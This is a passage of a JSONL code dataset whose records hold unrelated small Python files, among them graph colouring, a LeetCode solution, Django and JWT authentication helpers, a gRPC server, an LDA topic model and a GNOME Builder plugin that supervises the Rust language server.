1*is_even\n is_even = 1-is_even\nfor v in range(V):\n temp_colors = colors.copy()\n for next_v in graph.graph[v]:\n try:\n temp_colors.remove(out[next_v])\n except ValueError:\n pass\n if len(temp_colors) == 0:\n out[v] = colors[-1] + 1\n colors.append(out[v])\ncolors_list = ['black', 'red', 'blue', 'yellow', 'green', 'white', 'pink', 'ivory', 'gray', 'cyan', 'gold', 'tan', 'brown', 'orange', 'coral', 'maroon']\ntry:\n os.remove('dothitomau.dot')\nexcept FileNotFoundError:\n pass\nf = open('dothitomau.dot', 'w+')\nf.write('graph dothi\\n{\\n')\nfor i in range(V):\n f.write('%d [fillcolor=%s, style=filled];\\n' % (i+1, colors_list[out[i]]))\nfor i in edges:\n f.write('%d -- %d;\\n' % (i[0], i[1]))\nf.write('}')\nf.close()\n\n\n\n\n","repo_name":"catShaark/b-a-i-t-a-p-t-o-a-n-r-o-i-r-a-c","sub_path":"coloring.py","file_name":"coloring.py","file_ext":"py","file_size_in_byte":1387,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70751813172","text":"class WordDistance:\n\n def __init__(self, wordsDict: List[str]):\n self.dic=defaultdict(list)\n for i, w in enumerate(wordsDict):\n self.dic[w].append(i)\n\n def shortest(self, word1: str, word2: str) -> int:\n list1,list2=self.dic[word1],self.dic[word2]\n i=j=0\n res=math.inf\n while i<len(list1) and j<len(list2):\n res=min(res,abs(list1[i]-list2[j]))\n if list1[i]<list2[j]:\n i+=1\n else:\n j+=1\n return res\n\n\n# Your WordDistance object will be instantiated and called as such:\n# obj = WordDistance(wordsDict)\n# param_1 = obj.shortest(word1,word2)","repo_name":"HaojunYuan/MyLeetCode","sub_path":"244-shortest-word-distance-ii/244-shortest-word-distance-ii.py","file_name":"244-shortest-word-distance-ii.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7805390474","text":"nama = 'M. Rafi Thufail'\nnim = 212410101082\nprint('Nama : ' + (nama))\nprint('NIM : ' + str(nim))\n\nnilai = float(input('Masukkan angka : '))\n\nhasil = None \nif nilai <= 100 and nilai > 80:\n hasil = 'A'\nelif nilai <= 80 and nilai >= 76:\n hasil = 'AB'\nelif nilai <= 75 and nilai >= 71:\n hasil = 'B'\nelif nilai <= 70 and nilai >= 66:\n hasil = 'BC'\nelif nilai <=65 and nilai >= 56:\n hasil = 'C'\nelif nilai <=55 and nilai >= 51:\n hasil = 'CD'\nelif nilai <=50 and nilai > 45:\n hasil = 'D'\nelif nilai <=45 and nilai >= 41:\n hasil = 'ED'\nelif nilai <=40 and nilai >= 0:\n hasil = 'E'\nelse:\n print('Masukkan angka dibawah 100 saja!!!')\n \nprint('Nilai {} = {}'.format(nilai, hasil))\n\n","repo_name":"WebsiteThufail/kelola-angka","sub_path":"212410101082_M.Rafi Thufail_konversi_nilai.py","file_name":"212410101082_M.Rafi Thufail_konversi_nilai.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14036866930","text":"import socket\n\nclass Client():\n def __init__(self, host, port):\n self._HOST = host\n self._PORT = port\n \n def send(self, msg):\n self.__client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.__client.connect((self._HOST, self._PORT))\n message = msg.encode()\n self.__client.send(message) # Send message to server\n response = self.__client.recv(1024).decode()\n self.__client.close()\n return response\n","repo_name":"OtavioFSantos/email-protocol","sub_path":"client/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39757116236","text":"# read input as list of starting sequences\r\ninp = [[int(x) for x in line.strip().split(',')] for line in open('input.txt')]\r\n\r\n\r\ndef rambunctious_recitation(seq, end):\r\n # first n-1 starting numbers append into dict\r\n # the number itself is a key, turn is a value\r\n spoken_nums = {n:turn+1 for turn,n in enumerate(seq[:-1])}\r\n # n-th starting number\r\n spoken = seq[-1]\r\n for turn in range(len(spoken_nums)+1, end):\r\n # if spoken number is not in a set of spoken numbers\r\n if spoken not in spoken_nums:\r\n # add a number into the set\r\n spoken_nums[spoken] = turn\r\n # the next spoken number is 0\r\n spoken = 0\r\n # else spoken number is already in spoken numbers\r\n else:\r\n most_recently_turn = spoken_nums[spoken]\r\n # update turn for a given number\r\n spoken_nums[spoken] = turn\r\n # the next spoken number will be 'age'\r\n # (the time a number was most recently spoken\r\n # before)\r\n spoken = turn - most_recently_turn\r\n return spoken\r\n\r\n\r\n# part 1\r\nprint(\"2020th number spoken in rambunctious recitation game:\")\r\nfor seq in inp:\r\n print(f'\\t{seq} -->', rambunctious_recitation(seq, 2020))\r\nprint()\r\n\r\n# part 2\r\nprint(\"30000000th number spoken in rambunctious recitation game:\")\r\nfor seq in inp:\r\n print(f'\\t{seq} -->', rambunctious_recitation(seq, 30000000))\r\nprint()\r\n","repo_name":"matusjokay/adventofcode","sub_path":"2020/15/15.py","file_name":"15.py","file_ext":"py","file_size_in_byte":1438,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"4313614544","text":"import argparse\nimport glob\nimport json\n\n\ndef create_jsonl_file(input_dir, output_dir):\n # Initialize an empty list to store the dictionaries\n data = []\n\n # Get a list of all the .txt files in the input directory\n txt_files = glob.glob(f\"{input_dir}/*.txt\")\n\n # Loop through each file and extract the data\n for txt_file in txt_files:\n # Open the file and read the lines\n with open(txt_file, \"r\") as f:\n lines = f.readlines()\n\n # Extract the conversation lines by removing the *Action* lines\n conversation = []\n for line in lines:\n if \"*Action*\" not in line:\n conversation.append(line.strip())\n\n # Combine the conversation lines into a single string\n conversation_str = \"\\n\".join(conversation)\n\n # Create a dictionary with the conversation string as the input and an empty output and a reward of 1.0\n data_dict = {\"input\": conversation_str, \"output\": \"\", \"reward\": 1.0}\n\n # Add the dictionary to the data list\n data.append(data_dict)\n\n # Write the data list to a jsonl file\n with open(f\"{output_dir}/output.jsonl\", \"w\") as f:\n for data_dict in data:\n # Remove any lines that start with the = sign in the output\n output_lines = data_dict[\"output\"].split(\"\\n\")\n output_lines = [line for line in output_lines if not line.startswith(\"=\")]\n output_str = \"\\n\".join(output_lines)\n\n # Update the data dictionary with the cleaned output\n data_dict[\"output\"] = output_str\n\n # Write the updated dictionary to the file\n json.dump(data_dict, f)\n f.write(\"\\n\")\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Organize training data for Pyg-style chat models.\")\n parser.add_argument(\"--input\", type=str, help=\"Input directory containing .txt files.\")\n parser.add_argument(\"--output\", type=str, help=\"Output directory to write output.jsonl file to.\")\n args = parser.parse_args()\n\n create_jsonl_file(args.input, args.output)\n","repo_name":"AlpinDale/VNParser","sub_path":"tools/data-parser.py","file_name":"data-parser.py","file_ext":"py","file_size_in_byte":2094,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"21511688299","text":"# -*- coding: utf-8 -*-\nfrom retrying import retry\nimport requests\nfrom requests.exceptions import ConnectionError, ConnectTimeout, ReadTimeout\nfrom fake_useragent import UserAgent\n\nheader = {\"User-Agent\": UserAgent().random}\n\n\ndef downloader(url, method, data=None, headers={}, proxies=None, retry_times=10):\n \"\"\"\n 通用下载器\n :param url: url\n :param method: 请求方法,只支持get跟post\n :param data: post表单参数\n :param proxies: 代理\n :param retry_times: 重试次数\n :return: 响应结果\n \"\"\"\n headers = dict(header, **headers)\n while retry_times > 0:\n try:\n if method == 'GET':\n if proxies:\n res = requests.get(url=url, headers=headers, proxies=proxies, timeout=30)\n else:\n res = requests.get(url=url, headers=headers, timeout=30)\n else:\n if proxies:\n res = requests.post(url=url, data=data, headers=headers, proxies=proxies, timeout=30)\n else:\n res = requests.post(url=url, data=data, headers=headers, timeout=30)\n if res.status_code in [200, 201, 202]:\n return res.text\n except (ConnectTimeout, ReadTimeout, ConnectionError):\n print(\"抓取失败\", url)\n return None\n except Exception as e:\n print(f'请求出错:{repr(e)}--开始重试')\n if retry_times > 0:\n retry_times -= 1\n\n\n@retry(stop_max_attempt_number=8)\ndef downloader_old(url, method, data=None, options={}):\n \"\"\"\n 通用下载器,只处理get跟post请求\n :param url:\n :param method:\n :param data:\n :param proxies:\n :return:\n \"\"\"\n headers = dict(header, **options)\n while True:\n try:\n if method == 'GET':\n response = requests.get(url=url, headers=headers, timeout=10)\n if response.status_code in [200, 201, 202]:\n return response.text\n else:\n response = requests.post(url=url, headers=headers, data=data, timeout=10)\n if response.status_code in [200, 201, 202]:\n return response.text\n except (ConnectTimeout, ReadTimeout, ConnectionError):\n print(\"抓取失败\", url)\n return None\n except Exception as e:\n print(e.args)","repo_name":"pythonyhd/proxy_pool","sub_path":"proxypool/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2412,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"21"} +{"seq_id":"40793196816","text":"import timeit\n\nimport numpy as np\nimport pandas as pd\nfrom ranking_util import basestuff, TwoD\nfrom necklace_split_binary import necklace_split\nfrom copy import deepcopy\n\n\ndef hybrid(path, sens_attr, columns, number_of_buckets):\n G = list(pd.read_csv(path)[sens_attr].values)\n n = len(G)\n basestuff.read_file(file=path, columns=columns)\n TwoD.initialize()\n number_of_cuts = []\n boundary_indices = []\n boundaries = []\n hash_buckets = []\n Theta = []\n swap_index = []\n start = timeit.default_timer()\n for i in range(n * n):\n r_, j, theta = TwoD.GetNext()\n r = deepcopy(r_)\n if r is not None and j != -1:\n idx1 = r[j]\n idx2 = r[j + 1]\n if i == 0 or (idx2 in boundary_indices and G[idx1] != G[idx2]):\n F = necklace_split(\n path, columns, sens_attr, number_of_buckets, r, theta\n )\n boundary_indices = F[0]\n boundaries.append(F[1])\n hash_buckets.append((F[2]))\n number_of_cuts.append(len(F[1]))\n Theta.append(theta)\n swap_index.append(j)\n elif r is not None and j == -1:\n F = necklace_split(path, columns, sens_attr, number_of_buckets, r, theta)\n boundary_indices = F[0]\n boundaries.append(F[1])\n hash_buckets.append((F[2]))\n number_of_cuts.append(len(F[1]))\n Theta.append(theta)\n swap_index.append(j)\n else:\n break\n stop = timeit.default_timer()\n return (\n number_of_cuts[np.argmin(number_of_cuts)],\n boundaries[np.argmin(number_of_cuts)],\n hash_buckets[np.argmin(number_of_cuts)],\n Theta[np.argmin(number_of_cuts)],\n stop - start,\n swap_index\n )\n","repo_name":"UIC-InDeXLab/fairHashmap","sub_path":"hybrid.py","file_name":"hybrid.py","file_ext":"py","file_size_in_byte":1823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30904062621","text":"import unittest\nimport os\nimport sys\nimport filecmp\nimport pdb\n\nsys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))\nfrom pre_processing import metric_pre_processing as mpp\n\nclass MetricPreProcessingTest(unittest.TestCase):\n def test_add_rows(self):\n row1 = ['2019-11-25 15:58:59 CEST', '16.0', '11200000000', '8', '1.99', '1.94', '2.13']\n row2 = ['2019-11-25 15:58:59 CEST', '14.0', '11400000000', '8', '2.01', '1.96', '2.15']\n expected_result = ['2019-11-25 15:58:59 CEST', 30.0, 22600000000.0, 16.0, 4.0, 3.9, 4.28]\n\n self.assertEqual(expected_result, mpp._add_rows(row1, row2))\n\n def test_get_average_for_row(self):\n row = ['2019-11-25 15:58:59 CEST', 30.0, 22600000000.0, 16.0, 4.0, 3.9, 4.28]\n expected_result = [\n '2019-11-25 15:58:59 CEST',\n '15.0',\n '11300000000.0',\n '8.0',\n '2.0',\n '1.95',\n '2.14']\n\n self.assertEqual(expected_result, mpp._get_average_for_row(row, 2))\n\n def test_get_average_for_row_with_strings_as_elements(self):\n row = ['2019-11-25 15:58:59 CEST', '15.0', '11300000000.0', '8.0', '2.0', '1.95', '2.14']\n expected_result = [\n '2019-11-25 15:58:59 CEST',\n '15.0',\n '11300000000.0',\n '8.0',\n '2.0',\n '1.95',\n '2.14']\n\n self.assertEqual(expected_result, mpp._get_average_for_row(row, 1))\n\n def test_get_output_file_name_with_suffix(self):\n self.assertEqual('./test_suffix.csv', mpp._get_output_file_name_with_suffix('./test.csv', '_suffix'))\n self.assertEqual('/this/is/a/absolute/path/to/a/file_suffix.csv',\n mpp._get_output_file_name_with_suffix('/this/is/a/absolute/path/to/a/file.csv', '_suffix'))\n\n\n def test_get_interpolated_rows_1_second_gap(self):\n row1 = ['2019-11-19 16:56:32 CEST','12','10000000000','8','0.8','1.02','1.18']\n row2 = ['2019-11-19 16:56:34 CEST','10','11000000000','8','0.8','1.00','1.20']\n\n expected = [['2019-11-19 16:56:33 CEST', '11.0', '10500000000.0', '8.0', '0.8', '1.01', '1.19']]\n actual = mpp._get_interpolated_rows(row1, row2)\n\n self.assertEqual(expected, actual)\n\n def test_get_interpolated_rows_2_second_gap(self):\n row1 = ['2019-11-19 16:56:32 CEST','12','10000000000','8','0.8','1.02','1.18']\n row2 = ['2019-11-19 16:56:35 CEST','9','11500000000','8','1.1','1.02','1.21']\n\n expected = [\n ['2019-11-19 16:56:33 CEST', '11.0', '10500000000.0', '8.0', '0.9', '1.02', '1.19'],\n ['2019-11-19 16:56:34 CEST', '10.0', '11000000000.0', '8.0', '1.0', '1.02', '1.20'] \n ]\n actual = mpp._get_interpolated_rows(row1, row2)\n\n \n def test_get_metrics_on_seconds_interval(self):\n mpp.get_metrics_on_seconds_interval('./data/test_metrics.csv')\n\n output_file_written = os.path.exists('./data/test_metrics_seconds.csv')\n\n self.assertTrue(output_file_written)\n self.assertTrue(filecmp.cmp('./data/test_metrics_seconds.csv', './data/test_metrics_seconds_expected.csv'))\n os.remove('./data/test_metrics_seconds.csv')\n \n def test_fill_metrics_missing_seconds_using_linear_interpolation(self):\n mpp.fill_metrics_missing_seconds_using_linear_interpolation('./data/test_metrics2.csv')\n\n output_file_written = os.path.exists('./data/test_metrics2_filled.csv')\n self.assertTrue(output_file_written)\n self.assertTrue(filecmp.cmp('./data/test_metrics2_filled.csv', './data/test_metrics2_expected.csv'))\n # os.remove('./data/test_metrics_seconds.csv')\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"Context-Aware-Monitoring/Efficient-Stream-Monitoring","sub_path":"tests/test_metric_pre_processing.py","file_name":"test_metric_pre_processing.py","file_ext":"py","file_size_in_byte":3740,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22807046947","text":"#!/usr/bin/env python3\n\n#10 Ingresar 3 valores entre 0 y 100 y generar un gráfico de torta (usar 8.3)\n\nimport turtle\n\nt=turtle.Turtle()\nu=turtle.Turtle()\n\ndef CrearPoligono (radio,porcentaje,ancho,color=\"black\"):\n## t.speed(1)\n arco=0\n arco=(porcentaje*360/100)\n x=t.xcor()\n y=t.ycor()\n t.lt(90)\n t.penup()\n t.setposition(x,y)\n t.pendown()\n t.pencolor(\"black\")\n t.fillcolor(color) \n t.width (ancho)\n t.begin_fill()\n t.fd(radio)\n t.rt(180-arco)\n t.fd(radio)\n t.penup()\n t.setposition(x,y)\n t.pendown()\n t.lt(90-arco)\n t.circle(radio,arco)\n t.end_fill() \n t.hideturtle()\n\n\ncolor=[\"blue\",\"red\",\"green\"]\nxw=-50\nyw=-40\nfor b in range (3):\n porcentaje=(int(input(\"Ingrese porcentaje a graficar: \")))\n CrearPoligono (100,porcentaje,3,color[b])\n u.penup()\n u.setposition(xw+(50*b),yw)\n u.pendown()\n u.pencolor(color[b])\n u.write(str(porcentaje)+\"%\")\n u.hideturtle()\n\n\n##CrearPoligono (100,60,5,\"blue\")\n##CrearPoligono (100,80,5,\"green\")\n##CrearPoligono (100,120,5,\"red\")\n##CrearPoligono (100,100,5,\"orange\")\n \n","repo_name":"DamianNery/Tecnicas-De-Programacion","sub_path":"4Abril/13/GraficoTorta.py","file_name":"GraficoTorta.py","file_ext":"py","file_size_in_byte":1109,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"5073977924","text":"import sys\n\nimport extern as ext\n\n\ndef str_diff(str1, str2):\n if len(str1) != len(str2):\n print('problem3: str_diff: str1 length {} not equal to str2 length {}'.format(len(str1), len(str2)))\n return sys.maxsize\n\n diff_count = 0\n for i in range(len(str1)):\n if str1[i] != str2[i]:\n diff_count += 1\n\n return diff_count\n\n\ndef run():\n with open(ext.FilenameIn) as f_in:\n pattern = f_in.readline().strip()\n genome = f_in.readline().strip()\n d = int(f_in.readline())\n\n positions = []\n\n for i in range(len(genome) - len(pattern) + 1):\n genome_window = genome[i:i + len(pattern)]\n d_curr = str_diff(pattern, genome_window)\n if d_curr <= d:\n positions.append(str(i))\n\n with open(ext.FilenameOut, 'w') as f_out:\n f_out.write(' '.join(positions))\n","repo_name":"DeSerg/mipt-solutions","sub_path":"Term10/bioinformatics_tasks/problems/problem3.py","file_name":"problem3.py","file_ext":"py","file_size_in_byte":852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71021285173","text":"from django.contrib.auth import get_user_model\nfrom django.utils import timezone\nfrom rest_framework import generics, status, permissions\nfrom rest_framework.authtoken.models import Token\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\n\nfrom member.serializers import UserSerializer\nUserModel = get_user_model()\n\n\nclass TokenLoginView(APIView):\n \"\"\"\n 토큰으로 로그인\n \"\"\"\n\n permission_classes = []\n\n def post(self, request):\n r_token = request.data.get('token', None)\n\n if not r_token:\n return Response({'detail': '토큰이 없습니다.'}, status=status.HTTP_400_BAD_REQUEST)\n\n token = Token.objects.filter(key=r_token).first()\n if not token:\n return Response({'detail': '토큰이 유효하지 않습니다.'}, status=status.HTTP_404_NOT_FOUND)\n\n user = UserModel.objects.filter(id=token.user_id).first()\n if not user:\n return Response({'detail': '존재하지 않는 사용자입니다.'}, status=status.HTTP_404_NOT_FOUND)\n\n user.update_date = timezone.now()\n user.save()\n\n user_serializer = UserSerializer(user, context={'request': request})\n context = {\n 'token': token.key,\n 'user': user_serializer.data\n }\n\n return Response(context, status=status.HTTP_200_OK)\n\n\nclass UserLogoutView(APIView):\n \"\"\"\n 사용자 로그아웃\n \"\"\"\n\n permission_classes = (\n permissions.IsAuthenticated,\n )\n\n def post(self, request):\n r_user = request.user\n user = UserModel.objects.filter(id=r_user.id).first()\n if not user:\n return Response({'detail': '존재하지 않는 사용자입니다.'}, status=status.HTTP_400_BAD_REQUEST)\n \n try:\n request.user.auth_token.delete()\n except Exception as error:\n message = '{}'.format(error)\n return Response({'detail': message}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)\n\n return Response({'result': 'ok'}, status=status.HTTP_200_OK)\n","repo_name":"zinns58/example-django-test","sub_path":"project/member/views/auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":2085,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70869602613","text":"from datetime import datetime\nfrom config import SECRET_KEY, ALGORITHM\nimport jwt\nfrom jwt.exceptions import PyJWTError\nfrom fastapi import HTTPException, Depends, status\nfrom fastapi.security import HTTPAuthorizationCredentials, HTTPBearer\n\n\nsecurity_scheme = HTTPBearer()\n\ndef verify_jwt_token(token: str):\n try:\n payload = jwt.decode(token, SECRET_KEY, algorithms=[ALGORITHM])\n expiration = datetime.fromtimestamp(payload[\"exp\"])\n if datetime.now() > expiration:\n raise HTTPException(\n status_code=status.HTTP_401_UNAUTHORIZED,\n detail=\"Token has expired\",\n headers={\"WWW-Authenticate\": \"Bearer\"},\n )\n else:\n return payload\n except PyJWTError:\n raise HTTPException(\n status_code=status.HTTP_401_UNAUTHORIZED,\n detail=\"Invalid authentication credentials\",\n headers={\"WWW-Authenticate\": \"Bearer\"},\n )\n\nasync def get_current_user(token: HTTPAuthorizationCredentials = Depends(security_scheme)):\n return verify_jwt_token(token.credentials)\n","repo_name":"a7744hsc/DFChat","sub_path":"backend/utils/security.py","file_name":"security.py","file_ext":"py","file_size_in_byte":1101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16708959524","text":"from concurrent import futures\n\nimport grpc\nfrom flask import Flask\n\nimport proto_example_pb2\nimport proto_example_pb2_grpc\n\napp = Flask(__name__)\n\n\nclass GreetingServicer(proto_example_pb2_grpc.GreetingServiceServicer):\n def SayHello(self, request, context):\n response = proto_example_pb2.Response()\n response.message = f\"Hello, {request.message}!\"\n return response\n\n\nserver = grpc.server(futures.ThreadPoolExecutor(max_workers=10))\nproto_example_pb2_grpc.add_GreetingServiceServicer_to_server(GreetingServicer(), server)\nserver.add_insecure_port(\"[::]:50051\")\n\n\n@app.route(\"/\")\ndef index():\n return \"gRPC Server is running!\"\n\n\nif __name__ == \"__main__\":\n server.start()\n app.run(host=\"0.0.0.0\", port=5001)\n","repo_name":"surya18091997/personal","sub_path":"grpc_server.py","file_name":"grpc_server.py","file_ext":"py","file_size_in_byte":741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28794411371","text":"import time\n\nfrom osbrain import Agent\nfrom osbrain import run_agent\nfrom osbrain import run_nameserver\n\n\nclass Greeter(Agent):\n def on_init(self):\n self.bind('PUSH', alias='main')\n\n def hello(self, name):\n self.send('main', 'Hello, %s!' % name)\n\n\nclass Bob(Agent):\n def custom_log(self, message):\n self.log_info('Received: %s' % message)\n\n\nif __name__ == '__main__':\n\n # System deployment\n ns = run_nameserver()\n alice = run_agent('Alice', base=Greeter)\n bob = run_agent('Bob', base=Bob)\n\n # System configuration\n bob.connect(alice.addr('main'), handler='custom_log')\n\n # Send messages\n for _ in range(3):\n alice.hello('Bob')\n time.sleep(1)\n\n ns.shutdown()\n","repo_name":"opensistemas-hub/osbrain","sub_path":"examples/push_pull_inherit.py","file_name":"push_pull_inherit.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","stars":172,"dataset":"github-code","pt":"21"} +{"seq_id":"21484473653","text":"import os\nimport string\n\nimport numpy as np\nimport pandas as pd\n\nimport nltk\nfrom nltk import word_tokenize, sent_tokenize, corpus\nfrom nltk.stem import PorterStemmer, WordNetLemmatizer\n\nimport gensim\nfrom gensim.models import LdaModel\nfrom gensim.corpora.dictionary import Dictionary\n\n\nnltk.download('popular')\n\n\nclass Lda2vec:\n def __init__(self, tokenizer=None, num_topics=50):\n '''\n :parameter tokenizer: tokenizer function, default nltk word tokenizer\n :parameter num_topics: number of topics, default 50\n '''\n self.num_topics = num_topics\n self.tokenizer = tokenizer if tokenizer is not None else self.__tokenizer\n\n self.dictionary = None\n self.lda = None\n self.__is_fitted = False\n\n\n def __check_fitted(self):\n if not self.__is_fitted:\n raise RuntimeError('Model has not been fitted, call fit(input_corpus) first.')\n\n\n def __tokenizer(self, text):\n tokens = []\n porter_stemmer = PorterStemmer()\n lemmatizer = WordNetLemmatizer()\n stop_words = set(corpus.stopwords.words('english'))\n\n text = ''.join(char for char in text if char not in string.punctuation)\n\n for sent in sent_tokenize(text, language='english'):\n for word in word_tokenize(sent, language='english'):\n if len(word) < 2 or word.lower() in stop_words:\n continue\n\n word = lemmatizer.lemmatize(word)\n # word = porter_stemmer.stem(word)\n tokens.append(word)\n\n return tokens\n\n\n def fit(self, input_tokens=None, input_strings=None):\n '''\n :parameter input_strings: iterable of strings,\n e.g. ['i love cs', 'i hate statistics']\n :parameter input_tokens: iterable of iterable of tokens,\n e.g. [['i', 'love', 'cs'], ['i', 'hate', 'statistics']]\n '''\n\n if input_strings is None and input_tokens is None:\n raise RuntimeError('Either input_tokens or input_strings must not be None.')\n\n if not input_tokens:\n input_tokens = list(map(self.tokenizer, input_strings))\n\n self.dictionary = Dictionary(input_tokens)\n self.corpus = [self.dictionary.doc2bow(tokens) for tokens in input_tokens]\n self.lda = LdaModel(self.corpus, num_topics=self.num_topics, alpha='auto', eval_every=5)\n self.__is_fitted = True\n\n\n def get_doc_vec(self, words):\n '''\n :parameter words: iterable of tokens, e.g. ['i', 'love', 'cs']\n :returns np.ndarray of shape (num_topics, ) where each value represents the prob of the words being in that topic\n '''\n self.__check_fitted()\n vec = np.zeros(self.num_topics, )\n bow = self.dictionary.doc2bow(words)\n for i, p in self.lda[bow]:\n vec[i] = p\n return vec\n\n\nif __name__ == '__main__':\n data_dir = '../data/'\n df = pd.read_csv(os.path.join(data_dir, 'fulltrain.csv'), names=('Verdict', 'Text'))\n\n model = Lda2vec(num_topics=10)\n model.fit(input_strings=df['Text'])\n x = model.get_doc_vec('i love cs'.split())\n","repo_name":"careycwang/CS4248-Fake-News-Detection","sub_path":"src/Lda2vec.py","file_name":"Lda2vec.py","file_ext":"py","file_size_in_byte":3118,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"28124294712","text":"import sys\n\nLIMIT = 5 # 1000\n\n\ndef convert_to_intlist(line):\n return [int(elem) for elem in line.split()]\n\n\ndef minimum_steps_to_make_array_sorted(array, n):\n table = [[0] * LIMIT for _ in range(n)]\n elem = array[0]\n for x in range(1, LIMIT+1):\n table[0][x-1] = abs(x - elem)\n\n for ix in range(1, n):\n elem = array[ix]\n m = table[ix-1][0]\n for y in range(1, LIMIT+1):\n m = min(m, table[ix-1][y-1])\n table[ix][y-1] = m + abs(y - elem)\n return min(table[n-1][x-1] for x in range(1, LIMIT+1))\n\n\ndef main():\n reader = sys.stdin\n n = int(next(reader))\n array = convert_to_intlist(next(reader))\n result = minimum_steps_to_make_array_sorted(array, n)\n print(result)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"ghostrider77/competitive-programming-skills","sub_path":"Python/21_make_it_sorted.py","file_name":"21_make_it_sorted.py","file_ext":"py","file_size_in_byte":782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17443577003","text":"import gi\nimport os\n\nfrom gi.repository import GLib\nfrom gi.repository import Gio\nfrom gi.repository import GObject\nfrom gi.repository import Ide\n\nDEV_MODE = False\n\nclass RlsService(Ide.Object):\n _client = None\n _has_started = False\n _supervisor = None\n _monitor = None\n\n @classmethod\n def from_context(klass, context):\n return context.ensure_child_typed(RlsService)\n\n @GObject.Property(type=Ide.LspClient)\n def client(self):\n return self._client\n\n @client.setter\n def client(self, value):\n self._client = value\n self.notify('client')\n\n def do_parent_set(self, parent):\n \"\"\"\n After the context has been loaded, we want to watch the project\n Cargo.toml for changes if we find one. That will allow us to\n restart the process as necessary to pick up changes.\n \"\"\"\n if parent is None:\n return\n\n context = self.get_context()\n workdir = context.ref_workdir()\n cargo_toml = workdir.get_child('Cargo.toml')\n\n if cargo_toml.query_exists():\n try:\n self._monitor = cargo_toml.monitor(0, None)\n self._monitor.set_rate_limit(5 * 1000) # 5 Seconds\n self._monitor.connect('changed', self._monitor_changed_cb)\n except Exception as ex:\n Ide.debug('Failed to monitor Cargo.toml for changes:', repr(ex))\n\n def _monitor_changed_cb(self, monitor, file, other_file, event_type):\n \"\"\"\n This method is called when Cargo.toml has changed. We need to\n cancel any supervised process and force the language server to\n restart. Otherwise, we risk it not picking up necessary changes.\n \"\"\"\n if self._supervisor is not None:\n subprocess = self._supervisor.get_subprocess()\n if subprocess is not None:\n subprocess.force_exit()\n\n def do_stop(self):\n \"\"\"\n Stops the Rust Language Server upon request to shutdown the\n RlsService.\n \"\"\"\n if self._monitor is not None:\n monitor, self._monitor = self._monitor, None\n if monitor is not None:\n monitor.cancel()\n\n if self._supervisor is not None:\n supervisor, self._supervisor = self._supervisor, None\n supervisor.stop()\n\n def _ensure_started(self):\n \"\"\"\n Start the rust service which provides communication with the\n Rust Language Server. We supervise our own instance of the\n language server and restart it as necessary using the\n Ide.SubprocessSupervisor.\n\n Various extension points (diagnostics, symbol providers, etc) use\n the RlsService to access the rust components they need.\n \"\"\"\n # To avoid starting the `rls` process unconditionally at startup,\n # we lazily start it when the first provider tries to bind a client\n # to its :client property.\n if not self._has_started:\n self._has_started = True\n\n # Setup a launcher to spawn the rust language server\n launcher = self._create_launcher()\n launcher.set_clear_env(False)\n sysroot = self._discover_sysroot()\n if sysroot:\n launcher.setenv(\"SYS_ROOT\", sysroot, True)\n launcher.setenv(\"LD_LIBRARY_PATH\", os.path.join(sysroot, \"lib\"), True)\n if DEV_MODE:\n launcher.setenv('RUST_LOG', 'debug', True)\n\n # Locate the directory of the project and run rls from there.\n workdir = self.get_context().ref_workdir()\n launcher.set_cwd(workdir.get_path())\n\n # If rls was installed with Cargo, try to discover that\n # to save the user having to update PATH.\n path_to_rls = os.path.expanduser(\"~/.cargo/bin/rls\")\n if os.path.exists(path_to_rls):\n old_path = os.getenv('PATH')\n new_path = os.path.expanduser('~/.cargo/bin')\n if old_path is not None:\n new_path += os.path.pathsep + old_path\n launcher.setenv('PATH', new_path, True)\n else:\n path_to_rls = \"rls\"\n\n # Setup our Argv. We want to communicate over STDIN/STDOUT,\n # so it does not require any command line options.\n launcher.push_argv(path_to_rls)\n\n # Spawn our peer process and monitor it for\n # crashes. We may need to restart it occasionally.\n self._supervisor = Ide.SubprocessSupervisor()\n self._supervisor.connect('spawned', self._rls_spawned)\n self._supervisor.set_launcher(launcher)\n self._supervisor.start()\n\n def _rls_spawned(self, supervisor, subprocess):\n \"\"\"\n This callback is executed when the `rls` process is spawned.\n We can use the stdin/stdout to create a channel for our\n LspClient.\n \"\"\"\n stdin = subprocess.get_stdin_pipe()\n stdout = subprocess.get_stdout_pipe()\n 